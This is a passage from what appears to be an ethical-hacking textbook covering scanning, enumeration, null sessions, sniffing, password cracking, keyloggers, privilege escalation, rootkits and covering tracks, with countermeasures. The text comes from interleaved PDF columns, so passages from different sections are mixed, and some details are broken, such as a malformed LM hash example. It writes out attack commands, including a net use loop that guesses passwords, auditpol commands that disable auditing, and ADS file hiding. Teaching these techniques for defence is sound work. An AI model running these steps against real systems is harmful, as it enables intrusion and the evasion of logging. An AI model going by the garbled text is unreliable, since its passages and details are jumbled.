-sF FIN scan Proper security architecture, such as implementation of IDS and fire-
-sX XMAS tree scan walls should be followed.
-sN Null scan The firewall should be able to detect the probes sent by port-scanning
-sP Ping scan tools.
-sU UDP scan The firewall should carry out stateful inspections, which means it
-sO Protocol scan examines the data of the packet and not just the TCP header to deter-
mine whether the traffic is allowed to pass through the firewall.
-sA ACK scan
-sW Windows scan Network IDS should be used to identify the OS-detection method used
by some common hackers tools.
-sR RPC scan
Only needed ports should be kept open. The rest should be filtered or
-sL List / DNS scan
blocked.
-sI Idle scan
Determining the Operating System
-Po Dont ping
-PT TCP ping Determining the type of OS is also an objective of scanning, as this will deter-
-PS SYN ping mine the type of attack to be launched. Sometimes a targets operating system
-PI ICMP ping details can be found very simply by examining its Telnet banners or its File
Transfer Protocol (FTP) servers, after connecting to these services. We discuss
banner grabbing later.
TCP/IP stack fingerprinting is another technique to identify the particular A. Active stack fingerprinting is the most common form of fingerprinting.
version of an operating system. Since OS and device vendors implement TCP/ It involves sending data to a system to see how the system responds. Its
IP differently, these differences can help in determining the OS. We describe based on the fact that various operating system vendors implement the
fingerprinting in more detail later. TCP stack differently and responses will differ based on the operating
system. The responses are then compared to a database to determine
the operating system. Active stack fingerprinting is detectable because
Banner Grabbing it repeatedly attempts to connect with the same target system.
One of the easiest ways to discover what services are running on the open ports B. Passive stack fingerprinting is stealthier and involves examining traf-
is by banner grabbing. Banner grabbing also provides important information fic on the network to determine the operating system. It uses sniffing
about what type and version of software is running. Although most port scan- techniques instead of scanning techniques. Passive stack fingerprinting
ners can perform banner grabbing, it can be performed with just native Telnet usually goes undetected by an IDS or other security system but is less
or FTP. If the web server is not properly patched, Telnet can be used to grab accurate than active fingerprinting.
HTTP, FTP and SMTP server information, using the command syntax:
Telnet (IP Address) (Port #).
War Dialling
For example, executing a Telnet banner grab against a Microsoft-IIS server Since modems have very weak authentication and often proliferate unchecked
creates the following result: throughout an organization, they can present a readily available back door
C:\>telnet 192.168.0.100 80 into the network for an attacker and aid to discovering running services. War
dialling is the term given to accessing a network by using a modem and soft-
HTTP/1.1 400 Bad Request ware to scan for target systems with attached modems. Information about
these modems can then be used to attempt external unauthorized access.
Server: Microsoft-IIS/5.0
War diallers automatically test every phone line in an exchange to try to locate
Another way to grab banners is to use the free utility Netcat (http://netcat. modems that are attached to the network. A war dialler is a tool used to scan
sourceforge.net). Netcat has many uses, including banner grabbing. To grab a large pool of telephone numbers to try to detect vulnerable modems for pro-
a banner, execute Netcat from the command line with the syntax: viding access to a system. The program may search for dial tones by randomly
dialling numbers within a specific bank of numbers or by looking for a modem
or fax connection.
nc -v -n IP-Address Port
War Driving and War Walking

Fingerprinting War driving is a term used to describe a hacker who, armed with a laptop and
Fingerprinting is a process to determine the operating system on the tar- a wireless adapter card, travels via car, bus, subway train, or other form of
get computer. One advantage of fingerprinting over some of the more robust transport, sniffing for WLANs.
scanning techniques is that its less detectable. War walking refers to the same process, but using shoe leather instead of
Fingerprinting exploits the fact that various operating system vendors imple- transport, commonly in public areas such as malls, hotels or city streets.
ment the TCP stack differently. Uniquely built packets are sent to the target The concept of war driving is simple: Using a device capable of receiving an
host and the response is logged. This response is then is compared with a 802.11b signal, a device capable of locating itself on a map, and software that
database to aid in determining the targets operating system. will log data the moment a network is detected, the hacker moves from place
to place, letting these devices do their jobs. Over time, the hacker builds up
a database comprising the network name, signal strength, location, and IP/
namespace in use.
Wireless Scanners Tracking the attackers IP address through the logs of several proxy servers is
complex and tedious work. If one of the proxy servers log files is lost or incom-
A bunch of wireless scanning tools have been popping up recently and many
plete, the chain is broken and the hackers IP address remains anonymous.
of them are free. Some of these are:
Anonymizers: Anonymizers are services that attempt to make web surfing
NetStumbler
anonymous by utilizing a website that acts as a proxy server for the web client.
MiniStumbler
The anonymizer removes all the identifying information from a users comput-
AirSnort
ers while the user surfs the Internet, thereby ensuring the privacy of the user.
Kismet
Scanning Tools To visit a website anonymously, the hacker enters the website address into
the anonymizer software and the anonymizer software makes the request to
IPEye the selected site. All requests and web pages are relayed through the ano-
IPSec Scan nymizer site, making it difficult to track the actual requester of the webpage.
Netscan There are lots of websites that help to surf anonymously.
Icmpenum
Hping2
THC-Scan HTTP Tunnelling Techniques
SNMP Scanner
HTTP Tunnelling is a technique by which communications performed using
various network protocols are encapsulated using the HTTP protocol, the net-
Drawing Network Diagrams of Vulnerable Hosts
work protocols in question usually belonging to the TCP/IP family of proto-
A network diagram assists you to understand the network structure that will cols.
help in attack phase. A number of network-management tools can assist you
with this step. Such tools are generally used to manage network devices but The HTTP protocol therefore acts as a wrapper for a covert channel that the
can be turned against security administrators by enterprising hackers. network protocol being tunnelled uses to communicate.
SolarWinds Toolset, Queso, Harris Stat and Cheops are all network-manage-
ment tools that can be used for operating system detection, network diagram IP Spoofing
mapping, listing services running on a network, generalized port scanning,
and so on. These tools diagram entire networks in a GUI interface including A hacker can spoof an IP address when scanning target systems to minimize
routers, servers, hosts and firewalls. Most of these tools can discover IP ad- the chance of detection. One drawback of spoofing an IP address is that a
dresses, host names, services, operating systems and version information TCP session cant be successfully completed. Source routing lets an attacker
specify the route that a packet takes through the Internet. This can also min-
imize the chance of detection by bypassing IDS and firewalls that may block
or detect the attack. Source routing uses a reply address in the IP header to
Use of Proxy Servers in Launching an Attack
return the packet to a spoofed address instead of the attackers real address.
A proxy server is a computer that acts as an intermediary between the hacker
To detect IP address spoofing, you can compare the time to live (TTL) values:
and the target computer. Using a proxy server can allow a hacker to become
The attackers TTL will be different from the spoofed addresss real TTL.
anonymous on the network. The hacker first makes a connection to the proxy
server and then requests a connection to the target computer via the existing
connection to the proxy.
Sockschain: It is a tool that gives a hacker the ability to attack through a chain
of proxy servers. The main purpose of doing this is to hide the hackers real IP
address and therefore minimize the chance of detection. When a hacker works
through several proxy servers in series, its much harder to locate the hacker.
1. Extract usernames using enumeration.
2. Gather information about the host using null sessions.
3. Perform Windows enumeration using the Superscan tool.
4. Acquire the user accounts using the tool GetAcct.
5. Perform SNMP port scanning.
Many hacking tools are designed for scanning IP networks to locate NetBIOS
name information. For each responding host, the tools list IP address, NetBI-
OS computer name, logged in username and MAC address information. On
a Windows 2000 domain, the built-in tool net view can be used for NetBIOS
enumeration. To enumerate NetBIOS names using the net view command,
enter the following at the command prompt:
Enumeration
net view /domain
Enumeration occurs after scanning and is the process of gathering and com-
piling usernames, machine names, network resources, shares and services. nbtstat -A <IP address>
It also refers to actively querying or connecting to a target system to acquire
this information.
The net view command is a great example of a built-in enumeration tool. net
view is an extraordinarily simple command-line utility that will list domains
available on the network and then lay bare all machines in a domain. Here is
how to enumerate domains on the network using net view:
C:\>net view /domain
Another great built-in tool is nbtstat, which calls up the NetBIOS Name Table
from a remote system. The Name Table contains a great deal of information,
as seen in the following example:
C:\>nbtstat -A 192.168.202.33
During the enumeration stage, the hacker connects to computers in the tar-
get network and pokes around these systems to gain more information. While NetBIOS
the scanning phase might be compared to a knock on the door or a turn of
the doorknob to see if it is locked, enumeration could be compared to entering Microsofts Network Basic Input/Output System (NetBIOS) is a standard in-
an office and rifling through a file cabinet or desk drawer for information. It is terface between networks and PCs that enables applications on different com-
definitely more intrusive. puters to communicate within a LAN. NetBIOS was created by IBM for its
early PC network, was adopted by Microsoft and adapted to run over TCP/IP
The object of enumeration is to identify a user account or system account for and has since become the de facto industry standard. NetBIOS is not natively
potential use in hacking the target system. It isnt necessary to find a system routable across a Wide Area Network (WAN) and is therefore used primarily
administrator account, because most account privileges can be escalated to on Local Area Networks (LANs). NetBIOS systems identify themselves with a
allow the account more access than was previously granted. 15-character unique name and use Server Message Blocks (SMB), which al-
low remote directory, file and printer sharing. This feature makes NetBIOS a
hackers playground. The NetBIOS Name Resolution service listens on UDP
Steps of Enumeration
port 137; when it receives a query on this port, it responds with a list of all
Hackers need to be methodical in their approach to hacking. The following services it offers. NetBIOS uses two more ports i.e. 138 and 139.
steps are an example of those a hacker might perform in preparation for hack-
ing a target system:
Tools for Enumeration Users and host SIDs (Security Identifiers)
i. DumpSec is a NetBIOS enumeration tool. It connects to the target sys- Null sessions can also be used to establish connections to shares, including
tem as a null user with the net use command. It then enumerates us- such system shares as \\servername\IPC$. The IPC$ is a special hidden
ers, groups, NTFS permissions and file ownership information. share. Null sessions make the enumeration of users, machines and resources
easier for administrative purposes especially across domains. This is the lure
ii. Hyena is a tool that enumerates NetBIOS shares and additionally can for the attacker who intends to use a null session to connect to the machine.
exploit the null session vulnerability to connect to the target system
and change the share path or edit the registry. During port scanning, the attacker takes note of any response from TCP port
139 and 445. Why would these ports interest an attacker? The answer lies in
iii. The SMB Auditing Tool is a password-auditing tool for the Windows the SMB protocol.
and Server Message Block (SMB) platforms. Windows uses SMB to com-
municate between the client and server. The SMB Auditing Tool is able
to identify usernames and crack passwords on Windows systems. The SMB (Server Message Block) protocol is known for its use in file sharing
iv. The NetBIOS Auditing Tool is another NetBIOS enumeration tool. Its on Windows NT/2000 series among other things. Attackers can potentially
used to perform various security checks on remote servers running Net- intercept and modify unsigned SMB packets, then modify the traffic and for-
BIOS file sharing services ward it so that the server might perform undesirable actions. Alternatively,
the attacker could pose as the server or client after a legitimate authentication
v. User2SID and SID2User are command-line tools that look up Windows and gain unauthorized access to data.
service identifiers (SIDs from username input and vice versa.)
vi. Enum is a command-line enumeration utility. It uses null sessions and
can retrieve usernames, machine names, shares, group and member- NetBIOS Enumeration and Null Session Countermeasures
ship lists, passwords and Local Security policy information. Enum is The NetBIOS null session use specific port numbers on the target machine.
also capable of brute-force dictionary attacks on individual accounts. Null sessions require access to TCP ports 135, 137,139 and/or 445. One
vii. UserInfo is a command-line tool thats used to gather usernames and countermeasure is to close these ports on the target system. This can be ac-
that can also be used to create new user accounts. complished by disabling SMB services on individual hosts by unbinding the
TCP/IP WINS client from the interface in the network connections properties.
viii. GetAcct is a GUI-based tool that enumerates user accounts on a sys-
tem. An attacker will use the information gained from NULL sessions and try to
logon to the system, using various tools that will try different username and
ix. SMBBF is a SMB brute-force tool that tries to determine user accounts password combinations. Common attacks against computers have shown
and accounts with blank passwords. that attackers will typically gain access to the system, install FTP servers, IRC
bots, and DDOS tools, then copy the illegal (copyrighted and pirated) software
up for distribution.
Null Sessions
A null session occurs when you log in to a system with no username or pass-
word. Once a hacker has made a NetBIOS connection using a null session to How to Disable NetBIOS NULL Sessions?
a system, they can easily get a full dump of all usernames, groups, shares, Disabling NULL session on your Windows PC can keep you from getting in-
permissions, policies, services and more using the Null user account. fected. To implement this countermeasure, perform the following steps:
You can establish a Null Session with a Windows (NT/2000/XP) host by log-
ging on with a null user name and password. Using these null connections
allows you to gather the following information from the host: 1. Open the properties of the network connection.
2. Click TCP/IP and then the Properties button.
List of users and groups
3. Click the Advanced button.
List of machines 4. On the WINS tab, select disable NetBIOS over TCP/IP.
List of shares
A. Windows XP Home Edition SNMP Enumeration
Note: This also works in Windows 2000, XP, 7, 8, 8.1 and 10 Simple Network Management Protocol (SNMP) is a TCP/IP standard protocol
that is used for remote monitoring, managing hosts, routers, and devices on
1. Open regedit.exe from run Set the Following Registry Key: a network. SNMP works through a system of agents and nodes. Gathering in-
formation about hosts, routers, devices etc. with the help of SNMP is known
2. Choose Edit _ Add Value. Enter these values:
as SNMP enumeration.
HKLM/System/CurrentControlSet/Control/LSA/Restrict Anony-
The names of the default community strings are public and private, which are
mous=2
transmitted in clear text. Default community strings are advantageous to a hack-
Value name: Restrict Anonymous er, as they provide more than enough information needed to launch an attack.
Data Type: REG_WORD
SNMP enumeration is the process of using SNMP to enumerate user accounts
Value: 2 on a target system. The Simple Network Management Protocol is used to man-
3. Reboot to make the changes take effect. age and monitor hardware devices connected to a network.
SNMP Enumeration Tools

A. Windows XP Professional Edition and Windows Server 2003
1. Go to Administrative Tools --> Local Security Policy --> Local Policies SNMPUtil
--> Security Options. Make sure the following two policies are enabled:
IP Network Browser from the Solar Winds
Network Access: Do not allow anonymous enumeration of SAM ac-
counts: Enabled (Default) SNMP Enumeration Countermeasures
The simplest way to prevent SNMP enumeration is to remove the SNMP agent
Network Access: Do not allow anonymous enumeration of SAM ac- on the potential target systems or turn off the SNMP service. If shutting off
counts and shares: Enabled SNMP isnt an option, then change the default read and read/write commu-
nity names. In addition, an administrator can implement the Group Policy
This can also be accomplished using the following registry keys: security option Additional Restrictions for Anonymous Connections, which
restricts SNMP connections.
HKLM\System\CurrentControlSet\Control\Lsa\Restrict Anony-
mous=1 (This disallows enumeration of shares)
DNS Zone Transfer
HKLM\System\CurrentControlSet\Control\Lsa\RestrictAnonymous- The zone transfer is the method a secondary DNS server uses to update its
SAM=1 (Default, not allowing enumeration of user accounts) information from the primary DNS server. Some systems may allow untrusted
Internet users to perform a DNS zone transfer. If a hacker obtains a copy of
the entire DNS zone for a domain, it may contain a complete listing of all hosts
2. Reboot to make the changes take effect. in that domain. The hacker needs no special tools or access to obtain a com-
plete DNS zone if the name server is promiscuous and allows anyone to do a
zone transfer. To begin to query the DNS, an attacker can perform a simple
zone transfer by using the nslookup tool.
Syntax: Sniffing
nslookup ls -d <domainname> A sniffer can be a packet-capturing or frame-capturing tool. It intercepts traf-
fic on the network and displays it in either a command-line or GUI format for
A lot of interesting network information can be enumerated with nslookup,
a hacker to view. Some sophisticated sniffers interpret the packets and can
such as:
reassemble the packet stream into the original data, such as e-mail or a docu-
Global catalog service ment. Sniffers are used to capture traffic sent between two systems. Depend-
ing on how the sniffer is used and the security measures in place, a hacker
Domain controllers can use a sniffer to discover usernames, passwords and other confidential
information transmitted on the network. Several hacking attacks and various
hacking tools require the use of a sniffer to obtain important information sent
In addition to nslookup, several third-party tools are available to assist in from the target system.
executing a DNS zone transfer:
Types of Sniffing
Enum
Passive Sniffing
UserInfo
Passive sniffing involves listening and capturing traffic and is useful in a net-
work connected by hubs. In networks that use hubs or wireless media to con-
DNS Zone Transfer Countermeasures nect systems, all hosts on the network can see all traffic; therefore a passive
packet sniffer can capture traffic going to and from all hosts connected via
DNS zone transfers are a necessary element of DNS and cannot be turned off the hub.
completely. If your infrastructure doesnt require DNS zone transfers, howev-
er, you can easily block zone transfers using the DNS property sheet:
1. Open DNS. Active Sniffing
2. Right-click a DNS zone and click Properties. Active sniffing involves launching an Address Resolution Protocol (ARP) spoof-
3. On the Zone Transfers tab, clear the Allow zone transfers check box. ing or traffic-flooding attack against a switch in order to capture traffic. A
switched network operates differently. The switch looks at the data sent to
it and tries to forward packets to their intended recipients based on MAC
DNS zone transfers should only be allowed between DNS servers and clients address. The switch maintains a MAC table of all the systems and the port
that actually need it. Other steps to take are: numbers to which theyre connected. This enables the switch to segment the
network traffic and send traffic only to the correct destination MAC addresses.
Set your firewall or router to deny all unauthorized inbound connec-

tions to TCP port 53. Sniffing Tools
Configure external name servers to provide information only about sys- Ethereal
tems directly connected to the Internet. Snort
Set the access control device or intrusion detection system to log this WinDump
type of information as hostile activity.
EtherPeek
Disable BIND so as not to leak DNS server versions of BIND. BIND ver-
WinSniffer
sions 8.x have an options keyword that can do this.
Iris
Implement DNS keys and even encrypted DNS payloads (for an addi-
tional layer of protection with zone transfers). Dsniff
Packet Crafter
SMAC
Cain & Abel
MAC Changer
Password Guessing
Sniffing Countermeasures Guessing passwords is one of the first steps to owing the box. While password
guessing seems as though it might be a fruitless task, its often successful
The best security defence against a sniffer on the network is encryption. Al-
because most users like to employ easy-to-remember passwords. Also, if any
though encryption wont prevent sniffing, it renders any data captured during
information about the user is available, like family names or hobbies, you
the sniffing attack useless because the hacker cant interpret the information.
might have a clue to the password. The most common passwords are pass-
Encryption such as AES and RC4 or RC5 can be utilized in VPN technologies
word, root, administrator, admin, operator, demo, test, Webmaster, backup,
and is a common method to prevent sniffing on a network.
guest, trial, member, private, beta, etc.
Tools such as can be used to protect network against sniffing
After finding that the NetBIOS TCP 139 port is open and accessible, a very
WinTCPKill effective method of hackers for breaking into Windows is by guessing the
Sniffdet password. A good place to start would be to create the IPC$ null session or to
attempt to connect to a default enumerated share like Admin$, C$, or %Sys-
netINTERCEPTOR temdrive% and try a username/password combination. Other accounts that
are good candidates for hacking are accounts that have never been used or
logged in to or havent had the password changed in a while. Once an account
System Hacking is identified, the attacker can issue the NET USE command, like this:
The system hacking cycle consists of six steps. The first step -enumeration
was discussed in the previous section. This section now covers the five re-
maining steps: net use * \\target_IP\share * /u:name
This will initiate a prompt for a password, such as:
c:\net use * \\10.1.1.13\c$ * /u:John
Cracking passwords
Type the password for \\10.1.1.13\c$:
Escalating privileges
The command completely successfully
Executing applications
Hiding files
Covering tracks Automated Password Guessing
Since its rarely easy to guess passwords with one try, and the attacker needs
to hit as many accounts as possible, it is a good idea for him to automate the
Cracking passwords
password guessing process as much as possible. One way to do that is by
Many hacking attempts start with getting a password to a target system. creating a simple file that loops the guessing with NET USE.
Passwords are the key piece of information needed to access a system, and
Using the NT/2000 command shell, create a simple username and password
users often select passwords that are easy to guess. Many reuse passwords
text file called credentials.txt and then pipe this text file into a FOR command
or choose one thats simple such as a pets name to help them remember it.
like this:
Because of this human factor, most password guessing is successful if some
information is known about the target. Information gathering and reconnais- C:\> FOR /F token=1, 2* %i in (credentials.txt)
sance can help give away information that will help a hacker guess a users do net use \\target\IPC$ %i /u: %j
password. Once a password is guessed or cracked, it can be the launching
point for escalating privileges, executing applications, hiding files, and cov- You can save these two lines of code in a text file called finder.cmd. A draw-
ering tracks. If guessing a password fails, then passwords may be cracked back to this type of looping file is that the attacker could inadvertently create
manually or with automated tools such as a dictionary or brute-force method. a Denial of Service attack against the machine if a password lockout policy is
in effect. A lockout policy is a limit on the allowed number of user attempts to
enter a password, before the system freezes the account for a time.
Some automated password-guessing tools include:
Legion Keystroke Loggers
NetBIOS Auditing Tool If all other attempts to sniff out domain privileges fail, then a keystroke logger
might be the solution. Keystroke loggers (or keyloggers) intercept the targets
keystrokes and either save them in a file to be read later or transmit them to
Password Sniffing
a predetermined destination accessible to the hacker.
Password sniffing is often a preferred tactic to guessing. Its a lot less work to
There are two types of keystroke loggers: hardware devices and software pro-
sniff credentials off the wire as users log in to a server than to guess them.
grams.
Once sniffed, simply replay the passwords to gain access. Since most network
traffic is unencrypted, sniffing may yield a lot of info; however, it requires that Although keyloggers are sometimes used in the payloads of viruses, they are
you have physical or logical access to the wire segment or resource. more commonly delivered by a Trojan-horse program or remote administra-
tion (RAT).
L0phtcrack
KerbCrack Hardware Keyloggers
ScoopLM Some hardware keystroke loggers consist of a small AA battery-sized plug
Dsniff that connects between the victims keyboard and computer. The device col-
lects each keystroke as it is typed and saves it as a text file on its own tiny
Ethereal
hard drive. Later, the keystroke logger owner returns, removes the device, and
Sniffit downloads and reads the keystroke information. These devices have memory
TCPDump capacities between 8KB and 2MB, which, according to manufacturers claims,
WinDump is enough memory to capture a years worth of typing.
Two other methods for getting passwords are
Dumpster diving Software Key loggers
Shoulder surfing A software keystroke logger program does not require physical access to the
Dumpster diving describes the acquisition of information that is discarded by users computer. It can be installed intentionally by someone who wants to
an individual or organization. In many cases, information found in trash can monitor activity on a particular computer or downloaded unwittingly as spy-
be very valuable to a hacker and could lead to password clues. Post-it notes ware and executed as part of a rootkit or a Remote Access Trojan (RAT). The
are rarely shredded and often contain passwords and logons. Other discarded software keylogger normally consists of two files: a DLL that does the entire
information may include technical manuals, password lists, telephone num- recording and an EXE that installs the DLL and sets the activation trigger.
bers, and organization charts. The two files must be present in the same directory. Then the keystroke logger
program records each keystroke the user types and uploads the information
Shoulder surfing is the oldest, lowest-tech way to troll for passwords. Its sim- over the Internet periodically to the installer.
ply standing behind someone and watching them type their password, then
trying to duplicate the keystrokes later. Its a commonly used way to gain
entry to button-coded doors and can still be used if the attacker has physical
Keylogging Tools
access to the target machine, most likely a co-workers. Its obviously not an
option for remote password guessing. There are a lot of software keyloggers. Several of them are free. Although
not technically keyloggers, products like Spector (www.spector.com) au-
tomatically take hundreds of screen shots every hour. Spector works
by taking a snapshot of whatever is on the targets computer screen and
stores in a hidden location on the targets hard drive, to be retrieved later.
Another tool, eBlaster (www.eblaster.com), records the targets computer ac-

tivity such as email, chat, instant messages, websites visited and keystrokes
typed and then send this recorded information to the attackers email ad-
dress. It sends duplicate copies of email to the attacker, within seconds of the
targets sending or receiving an email.
LM is not case sensitive: All alphabetic characters are converted to up-
percase. This effectively reduces the number of different combinations
Other software keyloggers include: a password cracker has to try.
ISpyNow. www.ispynow.com
All LM passwords are stored as two 7-character hashes. Passwords that
Invisible Keylogger. www.invisiblekeylogger.com are exactly 14 characters long will be split into two 7-character hashes.
PC Activity Monitor. www.keylogger.org Passwords with fewer than 14 characters will be padded up to 14 char-
acters.
Privilege Escalation Owing to the mathematics of password cracking, two 7-character hashes are
significantly easier to crack than one 14-character hash. To see why this is,
Very often, the attacker will not be able to snag the Administrator account and lets step through an example. Lets use the password 123456qwerty:
password, and will have to settle for access to the network using a non-admin
user account, like Guest. This means that the next step the attacker will proba-
bly take is to try to elevate his or her network privilege to that of an administra- 1. When this password is hashed with LM algorithm, it is first converted
tor, to gain full control of the system. This is called privilege escalation. This is to all uppercase: 123456QWERTY.
not easy, as privilege escalation tools must usually be executed physically from
a target machine on the network, although some of the tools listed in this sec- 2. The password is padded with null (blank) characters to make it 14-char-
tion allow remote privilege escalation. Most often, these tools require the hacker acter length: 123456QWERTY__.
to have access to that machine or server. One big problem with privilege escala-
3. Before hashing this password, the 14-character string is split into
tion tools is that the operating systems are continually patched to prevent these
halves: 123456Q and WERTY__.
tools from working. This means the attacker will need to know the OS of the
system on which he or she is trying to install the tool, and he or she will need 4. Each string is individually hashed and the results are concatenated:
to have a variety of tools to match to the OS. For example, GetAdmin.exe is a
small program that adds a user to the local administrators group. To use Ge- 123456Q = 6BF11E04AFAB197F
tAdmin, the attacker must logon to the server console to execute the program, WERTY__ = F1E9FFDCC75575B15 5.
as its run from the command line or from a browser and works only with NT
4.0 Service Pack 3. Another NT tool, hk.exe, exposes a Local Procedure Call flaw
in NT, allowing a non-admin user to be escalated to the administrators group.
The resulting hash is 6BF11E04AFAB197FF1E9FFDCC75575B15. The first
Privilege Escalation Tools half of the hash contains alphanumeric characters and could take L0phtcrack
several hours to crack, but the second half will take only about 60 seconds.
TOOL OS In contrast, NTLM authentication takes advantage of all 14 characters in the
pipeupadmin Windows 2000 password and allows lowercase letters. Thus, even though an attacker eaves-
billybastard Windows Server 2003, dropping on the Windows NT authentication protocol can attack it in the same
way as the LM authentication protocol, it will take far longer for the attack to
Windows XP getad Windows XP
succeed. If the password is strong enough, it will take a single 200 MHz Penti-
um Pro computer an average of 2,200 years to find the keys derived from it and
5,500 years to find the password itself (or 2.2 years and 5.5 years with 1,000
Password Cracking
such computers and so forth). WinNT Challenge/Response NTLMv2 has since
Passwords are generally stored and transmitted in an encrypted form called replaced the LM hash. For NTLMv2, the key space for password-derived keys
a hash. When a user logs on to a system and enters a password, a hash is is 128 bits. This makes a brute force search infeasible, even with hardware ac-
generated and compared to a stored hash. If the entered and the stored hash- celerators, if the password is strong enough. If both client and server are using
es match, the user is authenticated. Prior to Windows NT 4.0 SP4, Windows SP4, the enhanced NTLMv2 session security is negotiated. It provides separate
NT supported two kinds of challenge/response authentication, LanManager keys for message integrity and confidentiality and client input into the chal-
(LM) challenge/response, and Windows NT challenge/response (also known lenge to prevent chosen plain text attacks and makes use of the HMAC-MD5
as NTLM challenge/response). Versions of Windows prior to Windows 2000 algorithm for message integrity checking. In Windows 2000 Service Pack 2 and
use LM password hashes, which have several weaknesses: in later versions of Windows, a setting is available that lets a user prevent Win-
dows from storing a LAN Manager hash of the password.
Hybrid Attack
Password Cracking Techniques Another method of cracking is called a hybrid attack, which builds on the
dictionary method by adding numeric and symbolic characters to dictionary
Automated password crackers employ one or combination of three types of
words. Depending on the password cracker being used, this type of attack will
password attacks:
try a number of variations. The attack tries common substitutes of characters
Dictionary attack and numbers for letters (e.g. p@ssword and h4ckme). Some will also try add-
Brute force attack ing characters and numbers to the beginning and end of dictionary words (for
example, password99, password$% and so on).
Hybrid attack
Dictionary Attack Rainbow Attack

A new password attack method is called the rainbow crack technique. It trades
off the time-consuming process of creating all possible password hashes by
building a table of hashes in advance of the actual crack. After this process
is finished, the table, called a rainbow table, is used to crack the password,
which will then normally only take a few seconds.
Stealing SAM
The SAM file in Windows NT/2000 contains the usernames and encrypted
passwords in their hash form; therefore, accessing the SAM will give the at-
tacker potential access to all of the passwords. The SAM file can be obtained
The fastest method for generating hashes is a dictionary attack, which uses from the %systemroot%\system32\config directory, but the file is locked
all words in a dictionary or text file. There are many dictionaries available on when the OS is running so the attacker will need to boot the server to an al-
the Internet that covers most major and minor languages, names, popular ternate OS. This can be done with NTFSDOS (www.sysinternals.com), which
television shows and so on. Any dictionary word is a weak password and can will mount any NTFS partition as a logical drive.
be cracked quickly. Most cracking tools will include their own dictionaries
Another way to get the SAM is to copy from either the servers repair directory
with the utility or suggest links to find dictionaries to build your own. A spe-
or the physical ERdisk itself. Whenever rdisk /s is run, a compressed copy of
cific example of this approach is the LC5 password auditing and recovery tool,
the SAM called SAM._ is created in %systemroot%\repair. Expand this file us-
which performs the encrypted file comparison against a dictionary of over
ing c:\>expand sam._sam. Starting with WinNT SP3, Microsoft added a sec-
250,000 possible passwords.
ond layer of 128-bit encryption to the password hash called SYSKEY. Newer
versions of Windows place a backup copy in C:\winnt\repair\regnabk\sam
and employ SYSKEY to make the cracking harder.
Brute Force Attack
The most powerful password-cracking method is called the brute force meth-
od. Brute force randomly generates passwords and their associated hashes.
Brute force password guessing is just what it sounds like: trying a random ap-
proach by attempting different passwords and hoping that one works. Some
logic can be applied by trying passwords related to the persons name, job
title, hobbies or other similar items. Since there are so many possibilities, it
can take months to crack a password. Theoretically, all passwords are crack-
able from a brute force attack given enough time and processing power. Pene-
tration testers and attackers often have multiple machines to which they can
spread the task of cracking a password. Multiple processors greatly shorten
the length of time required to crack strong passwords.
Cracking Tools File Hiding
Once the hashes have been extracted from the SAM, an automated password Attackers use different methods to hide files on compromised servers. There
cracker like L0phtCrack LC5 or cain and able can crack them. are two ways of hiding files in Windows NT and Windows 2000:
Some other common password cracking tools are: Use the attrib command: attrib +h [file/directory]
Brutus Use NTFS Alternate Data Streaming (ADS)
WebCracker The NTFS file system used by Windows NT, 2000, and XP has a feature called
Alternate Data Streams (ADS) that was originally developed to provide com-
ObiWan
patibility with non-Windows file systems, like Macintosh Hierarchical File
Crack 5 System (HFS); but ADS can also allow data to be stored in hidden files that
Two cracking tools that use and Rainbow Tables are RainbowCrack and are linked to a regular visible file. These streams are not limited in size and
Ophcrack there can be more than one stream linked to the visible file.
This allows an attacker to hide his or her tools on the compromised system
Maintaining Access and retrieve them later. To see how creating an alternate data stream works:
Before the attacker leaves the system, he or she wants to make sure he or
she can have access to the box later. One way to do this and cover his or her 1. From the command line, type Notepad temp.txt.
tracks at the same time is to install a rootkit on the compromised system. A
2. Put some data in the test.txt file; save the file and close Notepad.
rootkit is a collection of software tools that a cracker uses to obtain adminis-
trator-level access to a computer or computer network. 3. From the command line, type dir temp.txt, and note the file size.
4. Go to the command line and type Notepad temp.txt:hidden.txt.
5. Type some text into Notepad; save the file, and close it.
Planting Rootkits
6. Check the file size again and check that it hasnt changed.
The intruder installs a rootkit on a computer after first obtaining user-level
7. If you open temp.txt, you see your original data and nothing else.
access, either by exploiting a known vulnerability or cracking a password. The
rootkit then collects user IDs and passwords to other machines on the net- 8. If you use the type command on the filename from the command line, you
work, thus giving the hacker root or privileged access. The rootkit NTrootkit still get the original data.
consists of utilities that also monitor traffic and keystrokes, create a backdoor 9. If you go to the command line and type temp.txt:hidden.txt, you get an error.
into the system for the hackers use, alter log files, attack other machines on
the network and alter existing system tools to circumvent detection. NTrootkit
can also: Some third-party tools are available to create Alternate Data Streams. The
ADS creation and detection tool makestrm.exe moves the physical contents of
a file to its stream. The utility ads_cat from Packet Storm is a utility for writing
Hide processes (that is, keep them from being listed) ADS that includes ads_extract, ads_cp, and ads_rm, utilities to read, copy,
Hide files and remove data from NTFS alternate file streams.
Hide registry entries

Intercept keystrokes typed at the system console Covering Tracks
Issue a debug interrupt, causing a blue screen of death
Even though the attacker has compromised the system, he or she isnt fin-
Redirect EXE files ished. He/she must disable logging, clear log files, eliminate evidence, plant
additional tools and cover his or her tracks. Once a hacker has successfully
gained Administrator access to a system, he or she will try to remove signs of
his or her presence. The evidence of having been there and done the damage
must be eliminated. When all incriminating evidence has been removed from
the target, he or she will install several back doors to permit easy access at
another time.
Disabling Auditing There are several steps to prevent or find Alternate Data Streams on your
system. To remove ADS manually, copy the front file to a FAT partition; then,
The first thing a hacker will do after gaining Administrator privileges is dis-
copy it back to NTFS. Streams are lost when the file is moved to FAT Partition.
able auditing.
Employ file integrity checkers to look for ADS and rootkits.
Auditpol is a tool included in the Windows NT Resource Kit for system ad-
ministrators. This tool can disable or enable auditing from the Windows com-
mand line. It can also be used to determine the level of logging implemented Some tools include:
by a system administrator.
AIDE (Advanced Intrusion Detection Environment)
c:\auditpol \\10.1.1.13 /disable
LANguard File Integrity Checker
(0) Audit Disabled
Tripwire
After compromising the system, the last thing a hacker will do is turn on au-
diting again using auditpol: Sfind
c:\auditpol \\10.1.1.13 /enable

Auditing enabled successfully. Rootkit countermeasures include the following:
Back up critical data, but not the binaries, if youve been hit.
Clearing the Event Log Wipe everything clean and reinstall the OS and applications from a
trusted source.
Hackers can also easily wipe out the logs in the event viewer. The hacker will
also try to wipe the event log by executing tools like: Dont rely on backups; you could be restoring from Trojaned software.
Elsave Keep a well documented automated installation procedure.
Evidence Eliminator
Keep trusted restoration media readily available.
Winzapper
Countermeasures Other vulnerability countermeasures you should consider are:

Monitor the event viewer logs. Logging is of no use if no one ever ana-
Its important to know what countermeasures exist for the tools weve listed,
lyzes the logs!
